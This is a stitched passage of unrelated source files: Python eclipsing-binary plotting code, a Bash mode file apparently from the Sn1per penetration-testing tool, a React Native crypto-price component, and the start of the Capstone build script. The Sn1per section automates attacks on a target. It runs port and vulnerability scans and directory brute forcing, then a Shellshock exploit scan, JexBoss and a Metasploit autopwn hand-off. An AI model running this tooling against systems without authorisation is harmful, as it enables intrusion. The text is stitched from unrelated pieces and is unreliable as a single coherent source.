    # Linear detrend fit to the out-of-eclipse (model > 0.999) points.
    linfit = np.poly1d(np.polyfit(keblat.jd[clip][mod>0.999], keblat.flux[clip][mod>0.999], 1))
#    _fgrid[ii,:] = np.interp(_tgrid[ii,:], keblat.jd[~clip * (keblat.quality<2)], keblat.flux[~clip * (keblat.quality<2)] / linfit(keblat.jd[~clip * (keblat.quality<2)]))
    _fgrid[ii,:] = np.interp(_tgrid[ii,:], keblat.jd[(keblat.quality<2)], keblat.flux[(keblat.quality<2)] / linfit(keblat.jd[(keblat.quality<2)]))
# Mask grid points falling inside data gaps (> 7 cadences wide).
gap = np.where(np.diff(keblat.jd[(keblat.quality<2)])>7.*0.0204)[0]
bad = np.zeros(_tgrid.shape[0]*_tgrid.shape[1]).astype(bool)
for ii in range(len(gap)-1):
    bad = bad | ((_tgrid.ravel()>=keblat.jd[keblat.quality<2][gap[ii]]) * (_tgrid.ravel()<=keblat.jd[keblat.quality<2][gap[ii]+1]))
bad = bad.reshape((_tgrid.shape[0], _tgrid.shape[1]))
# Phase-folded plot of each (good) eclipse cycle with a small vertical offset.
plt.figure(figsize=(8,5))
for ii in np.arange(_Neclipses)[~bad_eclipses]:
    good = ~(bad[ii,:] | np.append((np.diff(_fgrid[ii,:])==0), True))
    phase = ((_tgrid[ii,:][good])-keblat.tpe)%keblat.period/keblat.period
    phase[phase>0.8]-=1.
    plt.plot(phase, _fgrid[ii,:][good]+ii*0.0001, '.')
phase_peri = ((keblat.tpe - keblat.sudarsky(np.pi/2. - omega, e, period)) - keblat.tpe) % keblat.period/keblat.period
plt.axvline(phase_peri, linestyle='-', lw=2, alpha=0.7, color='0.1')
plt.text(0.001, 1.0035, '$\mathrm{PE}$', va='center', ha='center', rotation=35, fontsize=11)
plt.text(0.125, 1.0035, '$\mathrm{SE}$', va='center', ha='center', rotation=35, fontsize=11)
plt.text(phase_peri+0.001, 0.9997, '$\mathrm{periastron}$', fontsize=11)
plt.xlim((min(phase), max(phase)))
plt.ylim((0.9994, 1.004))
plt.xlabel('$\mathrm{Phase\ (P=40.8778\ d)}$')
plt.ylabel('$\mathrm{Offset Flux}$')
plt.title('$\mathrm{Eccentric\ Eclipsing\ System\ KIC\ 6864859}$')
#################### little snippet of code for cauldron on kic 6449 ####################
# NOTE(review): `prefix_in` is not defined in this script; scratch code.
# Three fixed-mass fit cases are loaded and their predicted secondary RVs
# compared against the broadening functions of each spectroscopic visit.
opt_lcrvpars = np.loadtxt(prefix_in+'lcrv_mass1.0_fix.lmfit')
keblat.plot_lcrv(opt_lcrvpars, prefix, savefig=False)
lcpars = [keblat.pars[zz] for zz in parnames_dict['lc']]
rvpars_case1 = [keblat.pars[zz] for zz in parnames_dict['rv']]
rv1_case1, rv2_case1 = keblat.rvfit(rvpars_case1, keblat.rv_t)
opt_lcrvpars = np.loadtxt(prefix_in+'lcrv_mass4.9_fix.lmfit')
keblat.plot_lcrv(opt_lcrvpars, prefix, savefig=False)
lcpars2 = [keblat.pars[zz] for zz in parnames_dict['lc']]
rvpars_case2 = [keblat.pars[zz] for zz in parnames_dict['rv']]
rv1_case2, rv2_case2 = keblat.rvfit(rvpars_case2, keblat.rv_t)
opt_lcrvpars = np.loadtxt(prefix_in+'lcrv_mass2.5_fix.lmfit')
keblat.plot_lcrv(opt_lcrvpars, prefix, savefig=False)
lcpars3 = [keblat.pars[zz] for zz in parnames_dict['lc']]
rvpars_case3 = [keblat.pars[zz] for zz in parnames_dict['rv']]
rv1_case3, rv2_case3 = keblat.rvfit(rvpars_case3, keblat.rv_t)
# Spectroscopic visit timestamps, shifted by 2454833 (presumably onto the
# Kepler BJD-2454833 time base -- confirm).
timestamps = np.array([2456557.73275, 2456559.72268, 2456584.63158, 2456585.63008,
                       2456757.89224, 2456760.90501, 2456761.87212, 2456763.88043,
                       2456784.82126, 2456786.79775, 2456787.80865, 2456815.78483,
                       2456816.76558, 2456818.76389, 2456819.76152])
timestamps -= 2454833.
## load bfouts per visit ##
bfout = []
for ii in range(15):
    bfout.append(np.loadtxt('data/6449358BFOut_{}.txt'.format(ii+1)))
bfout = np.array(bfout)
bcv = np.loadtxt('data/6449358_bcv.txt')  # presumably barycentric velocity corrections -- confirm
# One panel per visit: broadening function with the predicted secondary RV
# (scaled by 1e-3, bcv-corrected) overplotted for each mass case.
fig=plt.figure()
for ii in range(15):
    ax = fig.add_subplot(4,4,ii+1)
    ax.plot(bfout[ii, :, 0], bfout[ii, :, 1])
    ax.text(-244, -0.016, r'$\phi$='+str((timestamps[ii]-keblat.tpe)%keblat.period/keblat.period)[:5])
    ax.set_xlim((-250, 250))
    ax.axvline(rv2_case1[ii]*1e-3-bcv[ii,1], color='green', ls='--',
               label=str(np.round(rvpars_case1[0], 1))+', '+str(np.round(rvpars_case1[1], 2)))
    ax.axvline(rv2_case3[ii]*1e-3-bcv[ii,1], color='orange', ls='--',
               label=str(np.round(rvpars_case3[0], 1)) +', '+str(np.round(rvpars_case3[1], 2)))
    ax.axvline(rv2_case2[ii]*1e-3-bcv[ii,1], color='red', ls='--',
               label=str(np.round(rvpars_case2[0], 1)) +', '+str(np.round(rvpars_case2[1], 2)))
fig.text(0.5, 0.04, 'Uncorrected Radial Velocity (km s$^{-1}$)', ha='center')
fig.text(0.04, 0.5, 'Broadening Function', va='center', rotation='vertical')
plt.legend(loc='upper left')
|
# WEBPORTHTTP MODE #####################################################################################################
if [ "$MODE" = "webporthttp" ]; then
if [ "$REPORT" = "1" ]; then
if [ ! -z "$WORKSPACE" ]; then
args="$args -w $WORKSPACE"
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/domains 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/scans 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
fi
echo "$TARGET $MODE port$PORT `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-$PORT-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[https://xerosecurity.com"
echo -e "$OKORANGE + -- --=[Sn1per v$VER by @xer0dayz"
echo -e ""
echo -e ""
echo -e " ; , "
echo -e " ,; '. "
echo -e " ;: :; "
echo -e " :: :: "
echo -e " :: :: "
echo -e " ': : "
echo -e " :. : "
echo -e " ;' :: :: ' "
echo -e " .' '; ;' '. "
echo -e " :: :; ;: :: "
echo -e " ; :;. ,;: :: "
echo -e " :; :;: ,;\" :: "
echo -e " ::. ':; ..,.; ;:' ,.;: "
echo -e " \"'\"... '::,::::: ;: .;.;\"\"' "
echo -e " '\"\"\"....;:::::;,;.;\"\"\" "
echo -e " .:::.....'\"':::::::'\",...;::::;. "
echo -e " ;:' '\"\"'\"\";.,;:::::;.'\"\"\"\"\"\" ':; "
echo -e " ::' ;::;:::;::.. :; "
echo -e " :: ,;:::::::::::;:.. :: "
echo -e " ;' ,;;:;::::::::::::::;\";.. ':."
echo -e " :: ;:\" ::::::\"\"\"':::::: \": ::"
echo -e " :. :: ::::::; ::::::: : ; "
echo -e " ; :: ::::::: ::::::: : ; "
echo -e " ' :: ::::::....:::::' ,: ' "
echo -e " ' :: :::::::::::::\" :: "
echo -e " :: ':::::::::\"' :: "
echo -e " ': \"\"\"\"\"\"\"' :: "
echo -e " :: ;: "
echo -e " ':; ;:\" "
echo -e " -hrr- '; ,;' "
echo -e " \"' '\" "
echo -e " ''''$RESET"
echo ""
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -sV -Pn -p $PORT --open $TARGET -oX $LOOT_DIR/nmap/nmap-http-$TARGET.xml
port_http=`grep 'portid="'$PORT'"' $LOOT_DIR/nmap/nmap-http-$TARGET.xml | grep open`
if [ -z "$port_http" ]; then
echo -e "$OKRED + -- --=[Port $PORT closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port $PORT opened... running tests...$RESET"
if [ "$WAFWOOF" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING FOR WAF $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wafw00f http://$TARGET:$PORT | tee $LOOT_DIR/web/waf-$TARGET-http-port$PORT.txt 2> /dev/null
echo ""
fi
if [ "$WHATWEB" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING HTTP INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
whatweb -a 3 http://$TARGET:$PORT | tee $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.raw > $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.raw 2> /dev/null
echo ""
fi
if [ "$WIG" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING SERVER INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/wig/wig.py -d -q http://$TARGET:$PORT | tee $LOOT_DIR/web/wig-$TARGET-http-$PORT
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-http-$PORT > $LOOT_DIR/web/wig-$TARGET-http-$PORT.txt 2> /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 3 -I -s -R http://$TARGET:$PORT | tee $LOOT_DIR/web/headers-http-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 -I -s -R -L http://$TARGET:$PORT | tee $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 --max-time 5 -I -s -R -X OPTIONS http://$TARGET:$PORT | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port$PORT.txt 2> /dev/null
if [ "$WEBTECH" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
webtech -u http://$TARGET:$PORT | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-http-port$PORT.txt
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-http-$TARGET-$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-http-$TARGET-$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-http-$TARGET-$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ $CUTYCAPT = "1" ]; then
if [ ${DISTRO} == "blackarch" ]; then
/bin/CutyCapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
else
cutycapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
fi
fi
if [ $WEBSCREENSHOT = "1" ]; then
cd $LOOT_DIR
python $INSTALL_DIR/bin/webscreenshot.py -t 5 http://$TARGET:$PORT
fi
# Kick off a Burp Suite scan through its REST API (scope limited to this target:port).
if [ "$BURP_SCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:$PORT\"]}\"$RESET"
fi
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:$PORT\"]}"
echo ""
fi
# Targeted nmap run against this port with the HTTP vulnerability NSE scripts.
if [ "$NMAP_SCRIPTS" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -A -Pn -T5 -p $PORT -sV --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port$PORT
# Escape "<" so the report renders in HTML viewers.
# NOTE(review): "&lh;" looks like a typo for the entity "&lt;" -- confirm against the report renderer before changing.
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null
fi
# Passive URL discovery via the Common Crawl index (no packets sent to the target).
if [ "$PASSIVE_SPIDER" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
fi
# Historical URL discovery via the Wayback Machine CDX API.
if [ "$WAYBACKMACHINE" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
fi
# Active crawl with BlackWidow (depth 3), then merge active + passive results into one spider file.
if [ "$BLACKWIDOW" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
blackwidow -u http://$TARGET:$PORT -l 3 -s y -v n 2> /dev/null
cat /usr/share/blackwidow/$TARGET*/$TARGET*.txt 2> /dev/null > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
# Same "<" escaping as above (see the &lh; note at the nmap section).
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
fi
# Common-wordlist file/directory brute force (dirsearch and/or gobuster).
if [ "$WEB_BRUTE_COMMONSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$DIRSEARCH" == "1" ]; then
# NOTE(review): the unquoted "-e *" lets the shell glob the current directory; likely meant a literal "*".
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e $WEB_BRUTE_EXTENSIONS -f -r -t $THREADS --random-agents
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
fi
if [ "$GOBUSTER" == "1" ]; then
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-common.txt
fi
fi
# Full-wordlist brute force.
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$DIRSEARCH" == "1" ]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
fi
if [ "$GOBUSTER" == "1" ]; then
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-full.txt
fi
fi
# Exploit-oriented wordlist brute force.
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$DIRSEARCH" == "1" ]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
fi
if [ "$GOBUSTER" == "1" ]; then
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-exploits.txt
fi
fi
# Consolidate brute-force results into a single per-target file.
if [ "$DIRSEARCH" == "1" ]; then
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
if [ "$GOBUSTER" == "1" ]; then
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
# Always grab robots.txt for the loot directory.
wget http://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-http.txt 2> /dev/null
# Enumerate application servers (JBoss/Tomcat/etc.) with clusterd.
# NOTE(review): a near-identical CLUSTERD block runs again further down; likely duplicated.
if [ "$CLUSTERD" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd -i $TARGET -p $PORT | tee $LOOT_DIR/web/clusterd-$TARGET-port$PORT.txt
fi
# Fingerprint and scan the CMS with CMSmap, against both the web root and /wordpress/.
if [ "$CMSMAP" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
# BUG FIX: "port$PORTa.txt" expanded the undefined variable $PORTa (and $PORTb below),
# so the port number and a/b suffix were dropped from the report filenames.
# Brace the expansion so the literal "a"/"b" suffix survives.
cmsmap http://$TARGET:$PORT | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port${PORT}a.txt
echo ""
cmsmap http://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port${PORT}b.txt
echo ""
fi
# WordPress vulnerability scan (wpscan), root and /wordpress/; same ${PORT} fix as above.
if [ "$WPSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wpscan --url http://$TARGET:$PORT --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}a.txt
echo ""
wpscan --url http://$TARGET:$PORT/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}b.txt
echo ""
fi
# Generic web vulnerability scan with nikto; escape "<" for the HTML report.
if [ "$NIKTO" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h http://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-http-port$PORT.txt
# NOTE(review): "&lh;" looks like a typo for "&lt;" -- confirm against the report renderer.
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-http-port$PORT.txt
fi
cd $INSTALL_DIR
# Second clusterd pass (stderr suppressed this time); appears to duplicate the earlier block.
if [ "$CLUSTERD" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd -i $TARGET -p $PORT 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-http-port$PORT.txt
fi
# Shellshock (CVE-2014-6271) probe against common CGI paths.
if [ "$SHOCKER" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port $PORT | tee $LOOT_DIR/web/shocker-$TARGET-port$PORT.txt
fi
# JBoss/Java deserialization checks with JexBoss; strip ANSI colour codes from the raw log.
if [ "$JEXBOSS" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cd /tmp/
python /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET:$PORT | tee $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw > $LOOT_DIR/web/jexboss-$TARGET-port$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw 2> /dev/null
cd $INSTALL_DIR
fi
# Hand off to the Metasploit autopwn sub-mode (plain HTTP, hence SSL=false).
# NOTE(review): $METASPLOIT_EXPLOIT is unquoted here; "[" errors out if the variable is unset.
if [ $METASPLOIT_EXPLOIT = "1" ]; then
SSL="false"
source modes/web_autopwn.sh
fi
source modes/osint_stage_2.sh
# Closes the enclosing HTTP-port scan block opened earlier in this mode file.
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SCAN COMPLETE! $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
# Record the target as scanned and clean up stale FUSE artifacts.
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
if [ "$LOOT" = "1" ]; then
loot
fi
# Optional Slack notification with the finish timestamp.
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
exit
fi
<reponame>Lysandroc/topcriptocurrency<filename>src/components/CryptoCoins.js<gh_stars>0
import React from 'react';
import {StyleSheet, ScrollView, Text, Alert, View} from 'react-native';
import { connect } from 'react-redux';
import fetchCurrency from '../actions/fetchCurrency'
import CryptoCoinDetail from './CryptoCoinDetail';
import {Spinner, Header} from './common';
class CryptoCoins extends React.Component {
componentDidMount() {
this.props.fetchCurrency();
}
render() {
const {coins} = this.props;
if(coins.isFetching) {
return (
<View style={styles.container}>
<Spinner size="large"/>
</View>
);
}
return (
<ScrollView style={{backgroundColor:'#2a2a2a'}}>
<View style={styles.container}>
{this.renderDetail()}
</View>
</ScrollView>
);
}
renderDetail() {
const {coins} = this.props;
return coins.data.map((item,index) => <CryptoCoinDetail key={index} cryptoCurrencyCurrent={item}/>);
}
}
// Shared flex-wrap grid styling for the coin cards.
const containerStyle = {
  flex: 1,
  flexDirection: 'row',
  flexWrap: 'wrap',
  justifyContent: 'center',
  paddingTop: 10,
  backgroundColor: '#2a2a2a',
};

const styles = StyleSheet.create({ container: containerStyle });

// Keep the (state, ownProps) arity: react-redux inspects the function's length
// to decide when mapStateToProps must be re-invoked on props changes.
const mapStateToProps = (state, ownProps) => ({
  coins: state.coins,
});

export default connect(mapStateToProps, { fetchCurrency })(CryptoCoins);
#!/usr/bin/env bash
# Capstone Disassembly Engine
# By Nguyen Anh Quynh <aquynh@gmail.com>, 2013-2014
# Note: to cross-compile "nix32" on Linux, package gcc-multilib is required.
# build iOS lib for all iDevices, or only specific device
# Build the Capstone library for iOS. With no argument every supported
# iDevice architecture is built; otherwise only the one named in $1.
function build_iOS {
	IOS_SDK=$(xcrun --sdk iphoneos --show-sdk-path)
	IOS_CC=$(xcrun --sdk iphoneos -f clang)
	IOS_CFLAGS="-Os -Wimplicit -isysroot $IOS_SDK"
	IOS_LDFLAGS="-isysroot $IOS_SDK"
	if [ $# -eq 0 ]; then
		# no arch given: build a fat library for all iDevices
		IOS_ARCHS="armv7 armv7s arm64"
	else
		IOS_ARCHS="$1"
	fi
	CC="$IOS_CC" CFLAGS="$IOS_CFLAGS" LDFLAGS="$IOS_LDFLAGS" LIBARCHS="$IOS_ARCHS" ${MAKE}
}
# build Android lib for only one supported architecture
# Build the Capstone library for a single Android architecture using the NDK.
# Usage: build_android <arm|arm64> [extra make args...]
# Requires $NDK to point at the Android NDK root; honours $APILEVEL and $GCCVER.
function build_android {
	if [ -z "$NDK" ]; then
		echo "ERROR! Please set \$NDK to point at your Android NDK directory."
		exit 1
	fi
	# NDK prebuilt toolchains live under e.g. linux-x86_64 / darwin-x86_64,
	# so lowercase the L/D of `uname -s` to match.
	HOSTOS=$(uname -s | tr 'LD' 'ld')
	HOSTARCH=$(uname -m)
	TARGARCH="$1"
	shift
	case "$TARGARCH" in
	arm)
		[ -n "$APILEVEL" ] || APILEVEL="android-14" # default to ICS
		[ -n "$GCCVER" ] || GCCVER="4.8"
		CROSS=arm-linux-androideabi-
		;;
	arm64)
		[ -n "$APILEVEL" ] || APILEVEL="android-21" # first with arm64
		[ -n "$GCCVER" ] || GCCVER="4.9"
		CROSS=aarch64-linux-android-
		;;
	*)
		# BUG FIX: $1 was already consumed by `shift` above, so the old message
		# printed the wrong (or an empty) word; report the arch we actually parsed.
		echo "ERROR! Building for Android on $TARGARCH is not currently supported."
		exit 1
		;;
	esac
	TOOLCHAIN="$NDK/toolchains/$CROSS$GCCVER/prebuilt/$HOSTOS-$HOSTARCH"
	PLATFORM="$NDK/platforms/$APILEVEL/arch-$TARGARCH"
